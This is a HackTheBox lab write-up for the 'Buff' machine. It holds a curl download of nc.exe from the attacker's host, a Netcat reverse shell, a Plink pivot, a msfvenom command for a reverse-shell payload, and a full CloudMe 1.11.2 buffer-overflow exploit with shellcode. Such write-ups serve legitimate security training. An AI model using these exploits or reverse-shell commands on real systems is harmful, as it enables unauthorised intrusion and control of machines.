<!DOCTYPE html><html lang="en" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.5.1"><meta name="generator" content="Jekyll v4.1.1" /><meta property="og:title" content="HTB: Buff" /><meta name="author" content="Brian Peters" /><meta property="og:locale" content="en_US" /><meta name="description" content="IP: 10.10.10.198" /><meta property="og:description" content="IP: 10.10.10.198" /><link rel="canonical" href="/posts/htb-buff/" /><meta property="og:url" content="/posts/htb-buff/" /><meta property="og:site_name" content="0xdreadnaught" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-11-21T18:04:00-05:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HTB: Buff" /><meta name="twitter:site" content="@dr3dn0t" /><meta name="twitter:creator" content="@Brian Peters" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Brian Peters"},"mainEntityOfPage":{"@type":"WebPage","@id":"/posts/htb-buff/"},"description":"IP: 10.10.10.198","@type":"BlogPosting","url":"/posts/htb-buff/","headline":"HTB: Buff","dateModified":"2020-11-21T18:04:00-05:00","datePublished":"2020-11-21T18:04:00-05:00","@context":"https://schema.org"}</script><title>HTB: Buff | 0xdreadnaught</title><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script async src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="/assets/js/post.min.js"></script> <script defer src="/app.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">0xdreadnaught</a></div><div class="site-subtitle font-italic">I break things sometimes.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/0xdreadnaught" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/dr3dn0t" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['example','doamin.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>HTB: Buff</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HTB: Buff</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sat, Nov 21, 2020, 6:04 PM -0500" > Nov 21 <i class="unloaded">2020-11-21T18:04:00-05:00</i> </span> by <span class="author"> Brian Peters </span></div><div> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sat, Nov 21, 2020, 10:03 PM -0500" > Nov 21 <i class="unloaded">2020-11-21T22:03:23-05:00</i> </span></div></div><div class="post-content"><p>IP: 10.10.10.198</p><p>We’ll start things off with an NMap scan. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/06cfc558fe03d8b0c3ed3ca3e3649822.png" alt="06cfc558fe03d8b0c3ed3ca3e3649822.png" /></p><p>The webserver on port 8080 looks to be running Gym Management System. The standard footer has been changed to hide this, but it’s still on the contact page. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/c1b4ec2904be4e3ec168d8841d9c5104.png" alt="c1b4ec2904be4e3ec168d8841d9c5104.png" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/9b3d9de1efcab6ab008f565155f73edd.png" alt="9b3d9de1efcab6ab008f565155f73edd.png" /></p><p>We can use a public exploit to get a basic shell from <a href="https://www.exploit-db.com/exploits/48506">here</a>. If you’re running Kali 2020, you will probably need to fix the exploit in order for it to work since Python2.7 is heavily phased out. This can be done with <code class="language-plaintext highlighter-rouge">2to3-2.7 -w 48506.py</code>. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/7275456c3113cf7b9e1dcbcea0218d3d.png" alt="7275456c3113cf7b9e1dcbcea0218d3d.png" /></p><p>Now we can run the exploit properly with Python3. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/f64f50b891d5a7611026a15244cbf293.png" alt="f64f50b891d5a7611026a15244cbf293.png" /></p><p>We can grab the user flag now before we try to get a better shell on the box. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/1e8c67e104e7a1a0c79a921f93aafe15.png" alt="1e8c67e104e7a1a0c79a921f93aafe15.png" /></p><p>CertUtil doesn’t want to cooperate, but we do have access to Curl. We’ll host a Netcat binary with <code class="language-plaintext highlighter-rouge">python -m SimpleHTTPServer 80</code> and then run <code class="language-plaintext highlighter-rouge">curl -O &lt;kali-ip&gt;:80/nc.exe</code> to pull it to the target. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/4a95b684b25ee4d221f0a4bb0f455638.png" alt="4a95b684b25ee4d221f0a4bb0f455638.png" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/e1ec03a5cab2677f02cae976dc1bf2d2.png" alt="e1ec03a5cab2677f02cae976dc1bf2d2.png" /></p><p>Now we can start a listener and then call Netcat. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/f6956c3f6f6adca55ae60ed9c1b2ad8a.png" alt="f6956c3f6f6adca55ae60ed9c1b2ad8a.png" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/ebed04248fed4e721a46f157b490dbc6.png" alt="ebed04248fed4e721a46f157b490dbc6.png" /></p><p>If we take a look at running processes with <code class="language-plaintext highlighter-rouge">tasklist</code> we see a strange process called CloudMe. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/7843a116bb14da112accdcffccd36db4.png" alt="7843a116bb14da112accdcffccd36db4.png" /></p><p>Looking around, we find the exe in Shaun’s downloads folder. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/e3abd20723ec52b108ed4dcba88307cf.png" alt="e3abd20723ec52b108ed4dcba88307cf.png" /></p><p>A quick google search shows us that this version is vulnerable to a buffer overflow attack. Given the name of the box, <a href="https://www.exploit-db.com/exploits/48389">this</a> should be our way to privesc. The default port for CloudMe is 8888. We can check to see if it’s listening on that with <code class="language-plaintext highlighter-rouge">netstat -aof | findstr :8888</code>. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/15194e417049dd2769842e62bcc79a96.png" alt="15194e417049dd2769842e62bcc79a96.png" /></p><p>Unfortunately we can’t access this directly if we look back at our Nmap scan. We’ll have to find a way to pivot into it using something like Plink.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/e26a278e002293ad825c7dfbe53d1825.png" alt="e26a278e002293ad825c7dfbe53d1825.png" /></p><p>We need to run Curl in another instance of the web shell. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/7d184b4ad7770a1bd5612f598f738ed6.png" alt="7d184b4ad7770a1bd5612f598f738ed6.png" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/4104ddb888b79f62429201098b951c84.png" alt="4104ddb888b79f62429201098b951c84.png" /></p><p>Now we can start up the SSH service on our system for the incoming connection we’ll make with Plink. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/fb7892c83fd455faad4232846498a3c5.png" alt="fb7892c83fd455faad4232846498a3c5.png" /></p><p>Before we make the connection, I strongly suggest you use the <code class="language-plaintext highlighter-rouge">passwd</code> command to set a temp password, or use a temporary account in case someone manages to hijack your credentials. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/bfb63c6255693c09d4fcfbcbac53891b.png" alt="bfb63c6255693c09d4fcfbcbac53891b.png" /></p><p>After some tinkering, we find that trying to call Plink from within the CMD shell we have doesn’t work. Restarting the NC shell while passing powershell.exe shows the certificate dialog so we can confirm it. We have also set our SSH service to run on port 443 as well since HTB blocks SSH out on port 22 to keep users safer. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/ef60c279631269273f4b1338b32afce9.png" alt="ef60c279631269273f4b1338b32afce9.png" /></p><p>Now we can generate a payload for the CloudMe exploit using MsfVenom.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>msfvenom <span class="nt">-p</span> windows/exec <span class="nv">CMD</span><span class="o">=</span><span class="s1">'C:\xampp\htdocs\gym\upload\nc.exe &lt;kali-ip&gt; 4445 -e powershell.exe'</span> <span class="nt">-b</span> <span class="s1">'\x00\x0A\x0D'</span> <span class="nt">-f</span> python <span class="nt">-v</span> payload
</pre></table></code></div></div><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/d50e016d78503e5f469c1fc64f172b6b.png" alt="d50e016d78503e5f469c1fc64f172b6b.png" /></p><p>Now we have our finished exploit.</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
</pre><td class="rouge-code"><pre><span class="c1"># Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
</span>
<span class="c1">#Instructions:
# Start the CloudMe service and run the script.
</span>
<span class="kn">import</span> <span class="nn">socket</span>

<span class="n">target</span> <span class="o">=</span> <span class="s">"127.0.0.1"</span>

<span class="n">padding1</span>   <span class="o">=</span> <span class="s">b"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">1052</span>
<span class="n">EIP</span>        <span class="o">=</span> <span class="s">b"</span><span class="se">\xB5\x42\xA8\x68</span><span class="s">"</span> <span class="c1"># 0x68A842B5 -&gt; PUSH ESP, RET
</span><span class="n">NOPS</span>       <span class="o">=</span> <span class="s">b"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">30</span>

<span class="c1">#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
</span><span class="n">payload</span> <span class="o">=</span>  <span class="s">b""</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xd9\xd0\xd9\x74\x24\xf4\xba\x32\x4a\x21\x90\x58</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x2b\xc9\xb1\x40\x83\xe8\xfc\x31\x50\x14\x03\x50</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x26\xa8\xd4\x6c\xae\xae\x17\x8d\x2e\xcf\x9e\x68</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x1f\xcf\xc5\xf9\x0f\xff\x8e\xac\xa3\x74\xc2\x44</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x30\xf8\xcb\x6b\xf1\xb7\x2d\x45\x02\xeb\x0e\xc4</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x80\xf6\x42\x26\xb9\x38\x97\x27\xfe\x25\x5a\x75</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x57\x21\xc9\x6a\xdc\x7f\xd2\x01\xae\x6e\x52\xf5</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x66\x90\x73\xa8\xfd\xcb\x53\x4a\xd2\x67\xda\x54</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x37\x4d\x94\xef\x83\x39\x27\x26\xda\xc2\x84\x07</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xd3\x30\xd4\x40\xd3\xaa\xa3\xb8\x20\x56\xb4\x7e</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x5b\x8c\x31\x65\xfb\x47\xe1\x41\xfa\x84\x74\x01</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xf0\x61\xf2\x4d\x14\x77\xd7\xe5\x20\xfc\xd6\x29</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xa1\x46\xfd\xed\xea\x1d\x9c\xb4\x56\xf3\xa1\xa7</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x39\xac\x07\xa3\xd7\xb9\x35\xee\xbd\x3c\xcb\x94</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xf3\x3f\xd3\x96\xa3\x57\xe2\x1d\x2c\x2f\xfb\xf7</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x09\xdf\xb1\x5a\x3b\x48\x1c\x0f\x7e\x15\x9f\xe5</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xbc\x20\x1c\x0c\x3c\xd7\x3c\x65\x39\x93\xfa\x95</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x33\x8c\x6e\x9a\xe0\xad\xba\xd9\x3c\x0e\x3d\xbf</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x2d\xde\xcd\x63\xc5\x6a\x4a\xf3\x76\xe0\xce\x6c</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x01\x6b\xb3\x07\x81\x1f\x24\x89\x05\xbc\xd4\x2a</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xeb\x59\x51\xc8\xd3\x90\x91\x3c\x22\xe3\xff\x71</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\x70\x2d\x31\x42\x58\x05\x05\x96\xad\x45\x48\xb3</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xed\xf5\xfd\x4c\x88\x87\x72\xdb\x37\x04\x19\x35</span><span class="s">"</span>
<span class="n">payload</span> <span class="o">+=</span> <span class="s">b"</span><span class="se">\xd2\xac\x84\x49</span><span class="s">"</span>

<span class="n">overrun</span>    <span class="o">=</span> <span class="s">b"C"</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1500</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">padding1</span> <span class="o">+</span> <span class="n">NOPS</span> <span class="o">+</span> <span class="n">EIP</span> <span class="o">+</span> <span class="n">payload</span><span class="p">))</span>

<span class="n">buf</span> <span class="o">=</span> <span class="n">padding1</span> <span class="o">+</span> <span class="n">EIP</span> <span class="o">+</span> <span class="n">NOPS</span> <span class="o">+</span> <span class="n">payload</span> <span class="o">+</span> <span class="n">overrun</span> 

<span class="k">try</span><span class="p">:</span>
        <span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
        <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span><span class="mi">8888</span><span class="p">))</span>
        <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">exc_value</span><span class="p">)</span>
</pre></table></code></div></div><p>We’ll start up a new Netcat listener on port 4445 and fire off the exploit. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/f46a4c0b9690f0cac479efcd83437111.png" alt="f46a4c0b9690f0cac479efcd83437111.png" /> <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/1f85e6943af0a92fe0a7a6f19a515609.png" alt="1f85e6943af0a92fe0a7a6f19a515609.png" /></p><p>All that’s left is to grab the root flag. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="./../../assets/img/44a5971c51e4bcda3735e3b9b8477165.png" alt="44a5971c51e4bcda3735e3b9b8477165.png" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/write-ups/'>Write-ups</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb/" class="post-tag no-text-decoration" >HTB</a> <a href="/tags/pivot/" class="post-tag no-text-decoration" >pivot</a> <a href="/tags/overflow/" class="post-tag no-text-decoration" >overflow</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HTB: Buff - 0xdreadnaught&url=/posts/htb-buff/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HTB: Buff - 0xdreadnaught&u=/posts/htb-buff/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HTB: Buff - 0xdreadnaught&url=/posts/htb-buff/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/htb-buff/">HTB: Buff</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/htb/">HTB</a> <a class="post-tag" href="/tags/cewl/">Cewl</a> <a class="post-tag" href="/tags/joomla/">Joomla</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/overflow/">overflow</a> <a class="post-tag" href="/tags/pivot/">pivot</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-access/"><div class="card-body"> <span class="timeago small" > Nov 22 <i class="unloaded">2020-11-22T01:40:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB: Acces</h3><div class="text-muted small"><p> IP: 10.10.10.98 We’ll start off with an Nmap scan. FTP allows for anonymous login. We have to toggle FTP to binary mode with bin in order for the transfer to not error out. There are a lot...</p></div></div></a></div><div class="card"> <a href="/posts/htb-curling/"><div class="card-body"> <span class="timeago small" > Nov 22 <i class="unloaded">2020-11-22T01:45:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB: Curling</h3><div class="text-muted small"><p> IP: 10.10.10.150 We’ll start off with an Nmap scan. There is a custom site running on port 80. The mention of “Cewl” in the page name might be a hint about using Cewl to generate a worldlist...</p></div></div></a></div><div class="card"> <a href="/posts/htb-beep/"><div class="card-body"> <span class="timeago small" > Nov 22 <i class="unloaded">2020-11-22T14:04:00-05:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HTB: Beep</h3><div class="text-muted small"><p> IP: 10.10.10.7 We’ll kick things off with an nmap scan. There’s a lot to take in on this system. We’ll keep things simple and poke around the web server. Port 80 auto redirects us to port 443. ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <span class="btn btn-outline-primary disabled"><p>-</p></span> <a href="/posts/htb-access/" class="btn btn-outline-primary"><p>HTB: Acces</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/dr3dn0t">0xdreadnaught</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/htb/">HTB</a> <a class="post-tag" href="/tags/cewl/">Cewl</a> <a class="post-tag" href="/tags/joomla/">Joomla</a> <a class="post-tag" href="/tags/lfi/">LFI</a> <a class="post-tag" href="/tags/overflow/">overflow</a> <a class="post-tag" href="/tags/pivot/">pivot</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" 